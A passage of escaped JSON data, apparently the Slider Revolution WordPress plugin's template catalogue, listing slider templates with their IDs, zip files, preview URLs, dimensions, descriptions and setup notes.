13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"31\":{\"id\":\"32\",\"title\":\"Web Product Dark Hero\",\"alias\":\"web-product-dark-hero\",\"zip\":\"web-product-dark-hero.zip\",\"uid\":\"b6784e8925221f36677217979d26e6f0\",\"img\":\"web-product-dark-hero\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-header-image\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-header-image\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1400\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">A modern hero block with three common devices. The screens of each device can be changed easily!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"32\":{\"id\":\"33\",\"title\":\"Web Product Light Hero\",\"alias\":\"web-product-light-hero\",\"zip\":\"web-product-light-hero.zip\",\"uid\":\"428e65d6aaa6ef775429989d50516492\",\"img\":\"web-product-light-hero\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/hero-image-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=hero-image-wordpress\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1400\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">A modern hero block with three common devices. The screens of each device can be changed easily!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the image and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"33\":{\"id\":\"34\",\"title\":\"Web Product Light\",\"alias\":\"webproductlight\",\"zip\":\"webproductlight.zip\",\"uid\":\"fa23dab5bf1139c6393828647a9de4e0\",\"img\":\"webproductlight\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-cover-page\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-cover-page\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1400\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Instructions for <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/modify-burger-menu\\/\\\" target=\\\"_blank\\\">changing the menu<\\/a>.<\\/span><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"34\":{\"id\":\"35\",\"title\":\"Youtube Gallery\",\"alias\":\"youtube-gallery\",\"zip\":\"youtube-gallery.zip\",\"uid\":\"ee9e4928ac74f5f0c0b697ce708f5aa7\",\"img\":\"youtube-gallery\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-youtube-gallery\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-youtube-gallery\",\"version\":\"1.0.1\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\"> This slider is automatically populated by a YouTube stream. Just one slide is needed to show a whole feed!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The content source is set to <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/module-content\\/#flickr\\\" target=\\\"_blank\\\">\\\"YouTube Stream\\\"<\\/a>. Make sure to input your correct API information in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"socialmedia\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"35\":{\"id\":\"36\",\"title\":\"Youtube Hero\",\"alias\":\"youtubehero\",\"zip\":\"youtubehero.zip\",\"uid\":\"e0b2c12a45841bdf21cb96305f2c85bf\",\"img\":\"youtubehero\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-youtube-header\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-youtube-header\",\"version\":\"1.0.3\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">A YouTube video background hero block.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background video and texts.<br\\/><br\\/><\\/span>\\r\\nScreencast for <a href=\\\"https:\\/\\/www.youtube.com\\/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\\\" target=\\\"_blank\\\">mobile video<\\/a> considerations.<\\/a>\\r\\n<br\\/><br\\/>\\r\\nLearn how to <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/enable-sound-for-the-youtube-hero-template\\/\\\" target=\\\"_blank\\\">enable sound for the background video<\\/a><br \\/><br \\/>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"36\":{\"id\":\"37\",\"title\":\"Scroll Effect\",\"alias\":\"scroll-effect\",\"zip\":\"scroll-effect.zip\",\"uid\":\"417f59e9db87aa7e47c8509eb88d4af6\",\"img\":\"scrolleffect\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/big-bold-fullscreen-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=big-bold-fullscreen-slider\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider with a unique scroll effect and big, bold text.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>For further configuration options please view the <a href=\\\"https:\\/\\/https:\\/\\/www.themepunch.com\\/slider-revolution\\/custom-css-javascript\\/\\\" target=\\\"_blank\\\">\\\"Custom CSS\\/JS\\\"<\\/a> section in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"37\":{\"id\":\"38\",\"title\":\"Content Zoom\",\"alias\":\"content-zoom\",\"zip\":\"content-zoom.zip\",\"uid\":\"42ef8cdb70d42ec6ff6fa3b69a027b5f\",\"img\":\"contentzoom\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/content-zoom-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=content-zoom-slider\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">A very unique full-width slider that uses <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a> to their potential.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>It might be helpful to use the \\\"hide\\/show layer\\\" feature to efficiently edit all content.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"38\":{\"id\":\"39\",\"title\":\"Food Carousel\",\"alias\":\"food-carousel\",\"zip\":\"food-carousel.zip\",\"uid\":\"a7bf54527b6658a0a308c70c729779fe\",\"img\":\"foodcarousel\\/slider_cover.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/food-carousel-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=food-carousel-slider\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">A fancy carousel with detail content on each slide. <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a> are used to show and hide layers.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>It might be helpful to use the \\\"hide\\/show layer\\\" feature to efficiently edit all content.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"40\":{\"id\":\"41\",\"title\":\"Travel Static Captions\",\"alias\":\"travel-static-captions\",\"zip\":\"travel-static-captions.zip\",\"uid\":\"bbe7d61c7c741ebc7aa1ce1082b0cb71\",\"img\":\"travel-static-captions\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/travel-slideshow\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=travel-slideshow\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">A slideshow example with static captions layers above a rotating image background.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"41\":{\"id\":\"42\",\"title\":\"Concept\",\"alias\":\"concept\",\"zip\":\"concept.zip\",\"uid\":\"47cb06083e87503762f6746725117a3c\",\"img\":\"concept\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/fullscreen-wordpress-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fullscreen-wordpress-plugin\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider that uses <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a> to their potential.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>It might be helpful to use the \\\"hide\\/show layer\\\" feature to efficiently edit all content.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"42\":{\"id\":\"43\",\"title\":\"True Fullscreen\",\"alias\":\"fullscreen-button\",\"zip\":\"fullscreen-button.zip\",\"uid\":\"618a43bdf89333b555531f6d6ecde359\",\"img\":\"fullscreen-button\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-sidebar-slideshow\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-sidebar-slideshow\",\"version\":\"1.0.0\",\"required\":\"5.1\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A slider with a full-screen button that uses <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a> to their potential.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Just edit the slides to change the background images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"43\":{\"id\":\"44\",\"title\":\"Creative Freedom\",\"alias\":\"creativefreedom\",\"zip\":\"creativefreedom.zip\",\"uid\":\"8902bf6c93126c2c6323626b9e872621\",\"img\":\"creativefreedom\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-touch-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-touch-slider\",\"version\":\"1.0.0\",\"required\":\"5.1\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider with a unique vertical navigation and 3D-parallax effects.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Just edit the slides to change images, videos and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"44\":{\"id\":\"45\",\"title\":\"3D Parallax Scene\",\"alias\":\"parallaxscene\",\"zip\":\"parallaxscene.zip\",\"uid\":\"51566f1ce649708e97a0f5dfaf05ea19\",\"img\":\"parallaxscene\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-3d-parallax\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-3d-parallax\",\"version\":\"1.0.2\",\"required\":\"5.1\",\"width\":\"1240\",\"height\":\"700\",\"description\":\"<span class=\\\"ttm_content\\\">A 3D-parallax hero scene with mouse-controlled effects. Smart image arrangement creates a convincing 3D effect. Tooltips are shown using <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a>.<\\/span>\\r\\n<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"45\":{\"id\":\"46\",\"title\":\"Wow Factor\",\"alias\":\"slidingoverlays\",\"zip\":\"slidingoverlays.zip\",\"uid\":\"18002d17e8bc7ca61b0951f5305a759e\",\"img\":\"slidingoverlays\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/responsive-wordpress-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=responsive-wordpress-slider\",\"version\":\"1.0.0\",\"required\":\"5.1\",\"width\":\"1240\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">A 3D-parallax effect full-screen slider.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Just edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\nScreencast for <a href=\\\"https:\\/\\/www.youtube.com\\/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\\\" target=\\\"_blank\\\">mobile video<\\/a> considerations.<\\/a>\\r\\n<br\\/><br\\/>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"46\":{\"id\":\"47\",\"title\":\"3D Web Product\",\"alias\":\"web-product-light-hero-3d\",\"zip\":\"web-product-light-hero-3d.zip\",\"uid\":\"efd345c5da805414093e46066cefd751\",\"img\":\"web-product-light-hero-3d\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-3d-scene\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-3d-scene\",\"version\":\"1.0.0\",\"required\":\"5.1\",\"width\":\"1400\",\"height\":\"668\",\"description\":\"<span class=\\\"ttm_content\\\">A 3D-parallax hero scene slider with a convincing depth-effect and animated clouds.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Just edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"47\":{\"id\":\"48\",\"title\":\"WooCommerce Big\",\"alias\":\"woobig\",\"zip\":\"woobig.zip\",\"uid\":\"bfb09a39656c7c80e86b468fc5b3403c\",\"img\":\"woobig\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/woocommerce-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-slider\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1200\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">This slider is automatically populated by WooCommerce posts. Just one slide is needed to show a whole feed!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The content source is set to <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/module-content\\/#flickr\\\" target=\\\"_blank\\\">\\\"WooCommerce Slider\\\"<\\/a>. Make sure to select the products you want to show in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"postbased\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"48\":{\"id\":\"49\",\"title\":\"WooCommerce Small\",\"alias\":\"woocommercesmall\",\"zip\":\"woocommercesmall.zip\",\"uid\":\"b17c2adcc5c4c4b68a7ac6fee32fa030\",\"img\":\"woocommercesmall\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/woocommerce-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woocommerce-slider\",\"version\":\"1.0.0\",\"required\":\"5.1\",\"width\":\"400\",\"height\":\"266\",\"description\":\" <span class=\\\"ttm_content\\\">This slider is automatically populated by WooCommerce posts. Just one slide is needed to show a whole feed!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The content source is set to <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/module-content\\/#flickr\\\" target=\\\"_blank\\\">\\\"WooCommerce Slider\\\"<\\/a>. Make sure to select the products you want to show in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"postbased\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"49\":{\"id\":\"50\",\"title\":\"Restaurant Header\",\"alias\":\"finedining\",\"zip\":\"finedining.zip\",\"uid\":\"03481a9e258501fbe3888b48830ea845\",\"img\":\"finedining\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/restaurant-hero-header\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=restaurant-hero-header\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen hero block slider that shows different background layers on button hover using <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a>.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image and texts.<br\\/><br\\/><\\/span>\\r\\nScreencast for <a href=\\\"https:\\/\\/www.youtube.com\\/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\\\" target=\\\"_blank\\\">mobile video<\\/a> considerations.<\\/a>\\r\\n<br\\/><br\\/>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"50\":{\"id\":\"51\",\"title\":\"Agency Website Header\",\"alias\":\"agency-intro\",\"zip\":\"agency-intro.zip\",\"uid\":\"e9be2afdd55a0c8d0d8d0cc12ba4c82f\",\"img\":\"agency-intro\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/agency-website-hero-header\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=agency-website-hero-header\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\" <span class=\\\"ttm_content\\\">A full-screen hero block slider with ken burns effect and video modal on button click. <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a> are used to achieve this effect.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>It might be helpful to use the \\\"hide\\/show layer\\\" feature to efficiently edit all content.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"51\":{\"id\":\"52\",\"title\":\"Team 